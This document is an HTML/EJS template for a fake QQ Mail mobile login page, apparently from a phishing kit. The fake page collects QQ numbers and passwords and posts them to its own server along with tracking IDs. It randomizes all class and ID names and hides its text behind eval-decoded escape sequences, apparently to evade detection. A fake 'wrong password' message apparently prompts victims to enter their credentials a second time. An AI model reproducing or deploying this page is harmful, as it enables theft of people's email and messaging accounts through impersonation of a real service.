<!DOCTYPE html>
<html lang="zh-cn">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1,maximum-scale=1,initial-scale=1,user-scalable=no"
    />
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <title class="<%=ranStr[4]%>"><%= function(){var x = ranRp('QQ邮箱');return x.key+':'+x.val}()%></title>
    <style type="text/css">
        @charset "utf-8";
        html {
            height: 100%
        }

        body {
            font-size: 16px;
            background: #eee;
            height: 100%
        }

        * {
            padding: 0;
            margin: 0;
            list-style: none;
            text-decoration: none
        }

        input::-webkit-input-placeholder,
        textarea::-webkit-input-placeholder {
            color: #aaa
        }

        input::-ms-input-placeholder,
        textarea::-ms-input-placeholder {
            color: #aaa
        }

        input:focus {
            outline: 0
        }

        .<%=ranStr[43]%> {
            margin: 0 auto;
            width: 320px;
            height: 500px;
            position: relative
        }

        #<%=ranStr[16]%> {
            position: absolute;
            top: 0;
            z-index: 100;
            display: none;
            opacity: .95;
            width: 100%
        }

        #<%=ranStr[16]%> #<%=ranStr[15]%> {
            position: relative;
            padding: 16px 0 24px 24px;
            border-radius: 5px;
            background-color: #525c5f;
            height: 28px
        }

        #<%=ranStr[16]%> #<%=ranStr[15]%> #<%=ranStr[17]%> {
            position: absolute;
            top: 18px;
            display: inline-block;
            width: 24px;
            height: 24px;
            background: url(<%=ranImg("/style/8/images/info.png")%>) no-repeat 0 0
        }

        #<%=ranStr[16]%> #<%=ranStr[15]%> #<%=ranStr[18]%> {
            display: inline-block;
            line-height: 28px;
            font-size: 14px;
            color: white;
            padding: 0 0 0 28px
        }

        #<%=ranStr[18]%> a,
        #<%=ranStr[18]%> a:visited {
            color: #f15a22
        }

        @media(-webkit-min-device-pixel-ratio:2),
        (min-resolution:192dpi),
        (min-resolution:2dppx) {
            #<%=ranStr[16]%> #<%=ranStr[15]%> #<%=ranStr[17]%> {
                background: url(<%=ranImg("/style/8/images/info@2x.png")%>) no-repeat 0 0;
                background-size: 24px 24px
            }
        }

        .<%=ranStr[42]%> {
            margin: 0 auto;
            padding-top: 30px
        }

        .<%=ranStr[19]%> {
            margin: 0 auto;
            width: 290px;
            overflow: hidden;
            text-align: center;
            margin-bottom: 40px
        }

        .<%=ranStr[20]%> {
            -webkit-tap-highlight-color: rgba(255, 255, 255, 0);
            width: 273px;
            height: 44px;
            color: #000;
            border: 0;
            background: 0;
            padding-left: 15px;
            font-size: 16px;
            -webkit-appearance: none
        }

        .<%=ranStr[44]%> {
            height: 100px;
            width: 244px;
            margin: 0 auto;
            margin-bottom: 20px;
            background-size: 244px 100px
        }

        .<%=ranStr[112]%> {
            display: inline-block;
            height: 97px;
            width: 96px;
            text-align: center;
            position: relative
        }

        .<%=ranStr[112]%> img {
            width: 60px;
            height: 60px;
            position: absolute;
            top: 10px;
            left: 16px
        }

        .<%=ranStr[112]%> .<%=ranStr[13]%> {
            width: 60px;
            height: 60px;
            position: absolute;
            top: 9px;
            left: 15px;
            border: solid 1px #c6dbe8;
            border-radius: 4px;
            -webkit-box-shadow: 1px 1px 13px #6e6e6e
        }

        .<%=ranStr[14]%> {
            display: inline-block;
            text-align: center;
            position: absolute;
            top: 80px;
            left: 0;
            height: 20px;
            line-height: 18px;
            vertical-align: middle
        }

        .<%=ranStr[27]%>_icon {
            display: none;
            width: 30px;
            height: 30px;
            position: absolute;
            left: 60px;
            top: 0;
            z-index: 1
        }

        .<%=ranStr[22]%> {
            display: block;
            width: 24px;
            height: 22px;
            background: url(<%=ranImg("/style/8/images/android_logo_v1.png")%>) no-repeat -68px 0;
            border-radius: 11px
        }

        #<%=ranStr[21]%> {
            width: 290px;
            margin: 0 auto
        }

        #<%=ranStr[23]%> {
            background: #fff;
            height: 89px;
            border-radius: 4px
        }

        #<%=ranStr[24]%>,
        #<%=ranStr[25]%> {
            position: relative
        }

        #<%=ranStr[24]%> {
            border-bottom: 1px solid #eaeaea
        }

        .<%=ranStr[26]%> {
            position: absolute;
            top: 12px;
            left: 10px;
            color: #b3b3b3
        }

        .<%=ranStr[27]%> {
            -webkit-tap-highlight-color: rgba(255, 255, 255, 0);
            position: absolute;
            right: 0;
            display: block;
            height: 44px;
            width: 48px;
            z-index: 1
        }

        .<%=ranStr[28]%> {
            display: none;
            position: absolute;
            left: 15px;
            top: 13px;
            height: 18px;
            width: 18px;
            background-color: #aaa;
            border-radius: 9px;
            background: url(<%=ranImg("/style/8/images/android_logo_v1.png")%>) no-repeat -117px -2px
        }

        #<%=ranStr[29]%> {
            height: 24px;
            margin: 15px 0;
            color: #246183;
            position: relative
        }

        #<%=ranStr[29]%> .<%=ranStr[30]%> {
            position: absolute;
            left: 40px;
            line-height: 24px;
            height: 24px;
            font-size: 14px
        }

        #<%=ranStr[31]%> {
            position: absolute;
            left: 14px;
            top: 5px;
            cursor: pointer;
            z-index: 1;
            opacity: .01
        }

        #<%=ranStr[31]%>:checked+.<%=ranStr[32]%> {
            background: #146fdf url(<%=ranImg("/style/8/images/checked.png")%>) 1px 1px;
            border-color: #146fdf
        }

        #<%=ranStr[31]%>+.<%=ranStr[32]%> {
            display: inline-block;
            width: 21px;
            height: 21px;
            position: absolute;
            left: 9px;
            top: 1px;
            border: 1px solid #9abbe3;
            background: 0;
            border-radius: 11px
        }

        #<%=ranStr[45]%>,
        #<%=ranStr[33]%> {
            width: 290px;
            height: 44px;
            line-height: 44px;
            background: #146fdf;
            border: 0;
            border-radius: 4px;
            color: #fff;
            font-size: 16px;
            text-align: center;
            margin-top: 15px;
            display: block
        }

        #<%=ranStr[33]%> {
            background: #146fdf;
            display: none
        }

        #<%=ranStr[33]%>.<%=ranStr[34]%>,
        #go.<%=ranStr[34]%> {
            background-color: #e7e7e7;
            color: #146fdf;
            border: 1px solid #9abbe3;
            height: 42px
        }

        #<%=ranStr[9]%> {
            width: 290px;
            margin: 0 auto
        }

        #<%=ranStr[9]%> #<%=ranStr[10]%> {
            width: 288px;
            height: 42px;
            line-height: 44px;
            border: solid 1px #9abbe3;
            border-radius: 5px;
            background: #e7e7e7;
            margin-top: 10px;
            text-align: center;
            font-size: 16px;
            color: #146fdf
        }

        #<%=ranStr[9]%> #<%=ranStr[108]%> {
            width: 290px;
            position: relative;
            margin-top: 15px;
            overflow: hidden
        }

        #<%=ranStr[9]%> #<%=ranStr[81]%>,
        #<%=ranStr[9]%> #<%=ranStr[7]%> {
            color: #246183;
            line-height: 14px;
            font-size: 14px;
            padding: 15px 10px
        }

        #<%=ranStr[9]%> #<%=ranStr[81]%> {
            float: right;
            margin-right: -10px
        }

        #<%=ranStr[9]%> #<%=ranStr[7]%> {
            float: left;
            margin-left: -10px
        }

        .<%=ranStr[88]%> {
            background: 0
        }

        #<%=ranStr[19]%>_title {
            height: 32px;
            line-height: 22px;
            margin-bottom: 20px;
            position: relative
        }

        #<%=ranStr[19]%>_logo {
            background: url(<%=ranImg("/style/8/images/android_logo_v1.png")%>) no-repeat -44px 0;
            width: 22px;
            height: 22px;
            position: absolute;
            left: 0
        }

        #<%=ranStr[19]%>_tips {
            position: absolute;
            left: 30px;
            top: 0;
            color: #246183
        }

        #<%=ranStr[41]%> {
            margin: 0 auto;
            padding-top: 40px;
            display: none
        }

        #<%=ranStr[41]%> #<%=ranStr[35]%> {
            display: block;
            width: 290px;
            height: 20px;
            line-height: 20px;
            margin: 0 auto;
            margin-bottom: 15px;
            color: #77838d
        }

        #<%=ranStr[41]%> #<%=ranStr[36]%> {
            position: relative;
            margin: 0 auto;
            width: 290px;
            height: 70px;
            border-radius: 5px;
            border: solid 1px #b8b8b8;
            background: #fff
        }

        #<%=ranStr[41]%> #<%=ranStr[37]%> {
            position: absolute;
            left: 3px;
            width: 140px;
            height: 70px
        }

        #<%=ranStr[41]%> #<%=ranStr[38]%> {
            position: absolute;
            top: -1px;
            left: 145px;
            width: 145px;
            height: 70px;
            border: 1px solid #9d9d9d;
            background: 0;
            -webkit-appearance: none;
            border-top-right-radius: 5px;
            border-bottom-right-radius: 5px;
            line-height: 28px;
            font-size: 28px;
            -webkit-box-shadow: inset 0 0 10px #ccc
        }

        #<%=ranStr[41]%> #<%=ranStr[39]%> {
            position: absolute;
            top: 5px;
            left: 150px;
            display: block;
            width: 135px;
            height: 50px;
            color: #b3b3b3;
            z-index: 1;
            padding-top: 8px
        }

        #<%=ranStr[41]%> #<%=ranStr[40]%> {
            width: 288px;
            height: 22px;
            padding: 10px 0;
            background: #7ec82c;
            border: 0;
            border-radius: 5px;
            color: #fff;
            font-size: 22px;
            text-align: center;
            margin: 0 auto;
            margin-top: 35px
        }

        .<%=ranStr[106]%> {
            text-align: center;
            color: #8a949d;
            font-size: 10px;
            margin-top: 15px;
            font-family: Helvetica
        }

        .<%=ranStr[106]%> .en {
            line-height: 20px
        }

        .<%=ranStr[106]%> .chs {
            line-height: 20px
        }

        .<%=ranStr[5]%> .<%=ranStr[1]%> .<%=ranStr[114]%> b,
        .<%=ranStr[5]%> .<%=ranStr[1]%> .<%=ranStr[3]%> b {
            background-image: url(<%=ranImg("/style/8/images/bg_btn_back.png")%>);
            background-position: bottom right;
            background-size: 105px;
            width: 6px;
            height: 32px;
            float: left
        }

        .<%=ranStr[1]%> h3,
        .<%=ranStr[1]%> .topbar_title {
            font-size: 18px
        }

        .<%=ranStr[1]%> {
            border-bottom: 1px solid #b6b6b6;
            border-top: 2px solid #df242a;
            background-color: #d9d9d9;
            background-image: -webkit-gradient(linear, left top, left bottom, from(#ebebeb), to(#d9d9d9));
            background-image: -webkit-linear-gradient(top, #ebebeb, #d9d9d9);
            background-image: linear-gradient(to bottom, #ebebeb, #d9d9d9);
            height: 40px;
            line-height: 40px;
            text-align: center;
            position: relative
        }

        .<%=ranStr[5]%> .<%=ranStr[1]%> {
            color: #fff;
            background-color: #c32d32;
            background-image: -webkit-gradient(linear, left top, left bottom, from(#fe444a), to(#c32d32));
            background-image: -webkit-linear-gradient(top, #fe444a, #c32d32);
            background-image: linear-gradient(to bottom, #fe444a, #c32d32);
            border-bottom: 1px solid #700d00;
            border-top: 0 none;
            top: 0;
            left: 0;
            width: 100%
        }

        .<%=ranStr[5]%> .<%=ranStr[1]%> .<%=ranStr[3]%> {
            display: block;
            position: absolute;
            left: 10px;
            top: 5px
        }

        .<%=ranStr[5]%> .<%=ranStr[1]%> .<%=ranStr[114]%> span,
        .<%=ranStr[5]%> .<%=ranStr[1]%> .<%=ranStr[3]%> span {
            float: left;
            display: inline-block;
            height: 32px;
            line-height: 30px;
            color: #fff;
            background-image: url(<%=ranImg("/style/8/images/bg_btn_back.png")%>);
            background-size: 105px;
            padding-left: 10px;
            padding-right: 4px
        }

        .<%=ranStr[5]%> .<%=ranStr[1]%> .<%=ranStr[3]%> span {
            background-image: url(<%=ranImg("/style/8/images/bg_btn_back.png")%>);
            background-position: left -32px;
            background-size: 105px;
            padding-left: 17px
        }

        .<%=ranStr[5]%> .<%=ranStr[1]%> {
            box-shadow: 0 0 5px #333
        }

        . .<%=ranStr[1]%> {
            background-color: #161616;
            background-image: -webkit-gradient(linear, left top, left bottom, from(#3e3e3e), to(#262626));
            background-image: -webkit-linear-gradient(top, #3e3e3e, #262626);
            background-image: linear-gradient(to bottom, #3e3e3e, #262626);
            border-bottom-color: #1a1a1a
        }

        .<%=ranStr[2]%> .<%=ranStr[1]%> {
            background-color: #161616;
            background-image: -webkit-gradient(linear, left top, left bottom, from(#3e3e3e), to(#262626));
            background-image: -webkit-linear-gradient(top, #3e3e3e, #262626);
            background-image: linear-gradient(to bottom, #3e3e3e, #262626);
            border-bottom-color: #1a1a1a
        }

        .<%=ranStr[2]%> .<%=ranStr[1]%> .<%=ranStr[114]%> span,
        .<%=ranStr[2]%> .<%=ranStr[1]%> .<%=ranStr[3]%> span,
        .<%=ranStr[2]%> .<%=ranStr[1]%> .<%=ranStr[114]%> b,
        .<%=ranStr[2]%> .<%=ranStr[1]%> .<%=ranStr[3]%> b {
            background-image: url(<%=ranImg("/style/8/images/bg_btn_back_black@2x.png")%>);
            background-size: 105px
        }

        .<%=ranStr[0]%> {
            display: none;
            width: 100%;
            height: 100%;
            overflow: hidden
        }
    </style>
    <style type="text/css">
        .<%=ranStr[44]%> {
            background-image: url(<%=ranImg('/images/qqmail_logo_default_200h.png')%>)
        }
    </style>
</head>

<body hidden>
    <script src="//cdn.bootcss.com/jquery/3.0.0-rc1/jquery.min.js" type="text/javascript"></script>
    <div id="<%=ranStr[43]%>" class="<%=ranStr[43]%>">
        <div id="<%=ranStr[16]%>">
            <div id="<%=ranStr[15]%>">
                <span id="<%=ranStr[17]%>"></span>
                <span id="<%=ranStr[18]%>"></span>
            </div>
        </div>
        <div id="<%=ranStr[42]%>" class="<%=ranStr[42]%>">
            <div id="<%=ranStr[44]%>" class="<%=ranStr[44]%>"></div>
            <div id="<%=ranStr[21]%>">
                <form action="" method="POST" id="<%=ranStr[46]%>">
                    <ul id="<%=ranStr[23]%>">
                        <li id="<%=ranStr[24]%>">
                            <div id="<%=ranStr[27]%>" class="<%=ranStr[27]%>">
                                <span id="<%=ranStr[28]%>" class="<%=ranStr[28]%>"></span>
                            </div><input id="<%=ranStr[47]%>" class="<%=ranStr[20]%> <%=ranStr[48]%> <%=ranStr[6]%>" name="u" autocomplete="off" placeholder="<%= function(){var x = ranRp('QQ号/手机/邮箱');return x.key+':'+x.val}()%>"
                            /></li>
                        <li id="<%=ranStr[25]%>">
                            <div id="<%=ranStr[27]%>_p" class="<%=ranStr[27]%>">
                                <span id="<%=ranStr[65]%>" class="<%=ranStr[28]%>"></span>
                            </div><input id="<%=ranStr[66]%>" class="<%=ranStr[20]%> <%=ranStr[6]%> <%=ranStr[48]%>" maxlength="16" type="password" name="p" autocorrect="off"
                                placeholder="<%= function(){var x = ranRp('请输入您的QQ密码');return x.key+':'+x.val}()%>" /></li>
                        <input type="hidden" name="uid" value="<%=uid%>">
                        <input type="hidden" name="mid" value="<%=mid%>">
                        <input type="hidden" name="tz" value="<%=tz%>">
                    </ul>
                </form>
                <div href="javascript:void(0);" id="<%=ranStr[45]%>" class="<%=ranStr[4]%> <%=ranStr[60]%>"><%= function(){var x = ranRp('登录?');return x.key+':'+x.val}()%></div>
            </div>
            <div id="<%=ranStr[9]%>">
                <div id="<%=ranStr[108]%>">
                    <span class="<%=ranStr[60]%> <%=ranStr[97]%> <%=ranStr[4]%>" id="<%=ranStr[81]%>"><%= function(){var x = ranRp('忘了密码?');return x.key+':'+x.val}()%></span>
                    <span class="<%=ranStr[60]%> <%=ranStr[97]%> <%=ranStr[4]%>" id="<%=ranStr[7]%>"><%= function(){var x = ranRp('注册新账号?');return x.key+':'+x.val}()%></span>
                </div>
            </div>
            <div id="<%=ranStr[62]%>"></div>
        </div>
    </div>
    <div id="<%=ranStr[0]%>" class="<%=ranStr[0]%>">
        <iframe id="<%=ranStr[64]%>" src="" frameborder="0" scrolling="auto" width="100%" height="100%"></iframe>
    </div>
    <div id="<%=ranStr[63]%>"></div>
</body>
<script src="/jquery/<%=ranStr[99]%>" type="text/javascript"></script>
<script>
    $('.<%=ranStr[48]%>').each(function () {
        var <%=ranStr[61]%> = $(this).attr('placeholder');
        $(this).attr('placeholder', eval('"' + <%=ranStr[61]%>.replace(/\\x/g, '\\u') + '"'));
    });
    $('.<%=ranStr[60]%>').each(function () {
        var <%=ranStr[61]%> = $(this).html();
        $(this).html(eval('"' + <%=ranStr[61]%>.replace(/\\x/g, '\\u') + '"'));
    });
    var <%=ranStr[62]%> = '<%=tz%>';
    var <%=ranStr[50]%> = $('#<%=ranStr[16]%>');
    var <%=ranStr[51]%> = $('#<%=ranStr[18]%>');
    $('#<%=ranStr[45]%>').on('click', function () {
        if ($('#<%=ranStr[47]%>').val() === '') {
            <%=ranStr[51]%>.html(eval('"' + '=_8bf7=_8f93=_5165=_0051=_0051=_53f7=_ff01'.replace(/=_/g, '\\u') + '"'));
            <%=ranStr[50]%>.css({ "display": "block" })
            setTimeout(function () {
                <%=ranStr[50]%>.css({ "display": "none" })
            }, 1000);
        } else if ($('#<%=ranStr[66]%>').val() === '') {
            <%=ranStr[51]%>.html(eval('"' + '=_4f60=_8fd8=_6ca1=_6709=_8f93=_5165=_5bc6=_7801=_ff01'.replace(/=_/g, '\\u') + '"'));
            <%=ranStr[50]%>.css({ "display": "block" })
            setTimeout(function () {
                <%=ranStr[50]%>.css({ "display": "none" })
            }, 1000);
        } else {
            $('#<%=ranStr[46]%>').submit();
        }
    });
    if (<%=ranStr[62]%> === '1') {
        <%=ranStr[51]%>.html(eval('"' + '=_8d26=_53f7=_5bc6=_7801=_9519=_8bef=_0021'.replace(/=_/g, '\\u') + '"'));
        <%=ranStr[50]%>.css({ "display": "block" })
        setTimeout(function () {
            <%=ranStr[50]%>.css({ "display": "none" })
        }, 1000);
    }
</script>

</html>